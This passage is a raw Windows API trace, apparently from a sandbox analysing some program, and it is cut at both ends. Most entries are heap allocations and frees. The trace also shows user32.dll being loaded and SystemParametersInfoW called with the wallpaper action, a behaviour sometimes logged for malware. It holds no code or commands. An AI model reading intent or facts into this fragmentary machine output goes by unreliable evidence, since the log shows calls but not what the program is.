hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0315.531] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0315.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0315.531] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0315.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0315.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0315.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0315.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0315.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0315.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0315.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0315.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0315.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0315.535] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0315.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0315.535] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0315.536] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0315.536] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0315.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0315.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0315.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0315.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0315.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0315.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0315.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0315.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0315.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0315.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0315.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0315.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0315.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0315.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0315.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0315.542] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0315.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0315.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0315.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0315.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0315.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0315.543] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0315.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0315.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0315.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0315.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.543] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0315.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, 